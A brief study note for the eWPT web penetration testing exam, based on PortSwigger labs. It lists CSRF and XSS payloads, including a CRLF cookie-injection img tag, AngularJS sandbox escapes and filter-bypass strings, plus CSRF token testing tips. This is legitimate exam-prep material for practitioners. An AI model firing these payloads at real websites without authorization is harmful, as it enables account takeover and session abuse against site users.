This note created with 3 day preparation for eWPT & 100% base on portswigger lab.
General Note :
- According the the eLearnSecurity eWPT forums, mods have said that you need to have every single vulnerability that is present in scope documented in your report in order to pass.
- When you begin the eWPT exam, you are given a letter that tells you the scope, rules of engagement, and explicitly spells out this “most severe part” that is necessary for passing the exam.
Payload :
- Auto submit — CSRF :
<script>document.forms[0].submit();</script>- Adding Cookie on vuln param — CSRF :
<img src="https://assets/?param=eneriiiiiiiiiii%0d%0aSet-Cookie:%20csrfKey=dTh9cPDHRGETeDxLixbxyhgzuQFEiuEG%3b%20SameSite=None" onerror="document.forms[0].submit()">- Leverage Open Redirect to XSS
javascript:alert('ener1')- When your “<” & “>” get blacklisted, use this :
'-alert('eneriiiiiiiiiiiiiiiiiiiiiiiiiiii')-'- You can break img using quote or svg & adding onload/onmouseover or else :
"><svg onload=alert('eneriiiiiiiiiiiiiiiii')>- You can close select using this payload
eneriiiiiiiiiiiiii"> </select> Inject_payload- Simple Angular JS Payload :
{{$on.constructor('alert("eneriiiiiiiiiiiiii")')()}}{{$eval.constructor('alert("eneriiiiiiiiiiiiiiiiiii")')()}}- Bypass angle bracket restriction ( “<” & “>”) using <>
<><img src=y0 onerror=alert('eneriiiiiiiiiiiiiiiiii')>XSS :
- Always read .js file, that could be protection/restrictor for XSS.
- Always check hidden param, on data or else.
- Spray tags & event to check blacklist/whitelisted spesific tag/word on Web App.
- Always check “HttpOnly” on header.
CSRF :
- Test HTTP method (GET/POST) to check CSRF Protection.
- Try to remove CSRF Token.
- Try CSRF Token to another account. ( These 2 account should be logon & don’t intercept Victim CSRF Token(Drop req))
- Use another account CSRF cookie & CSRF Token
Credit Photo : @Opal_00_58 (https://twitter.com/Opal_00_58/status/1661318640006995969/photo/1)
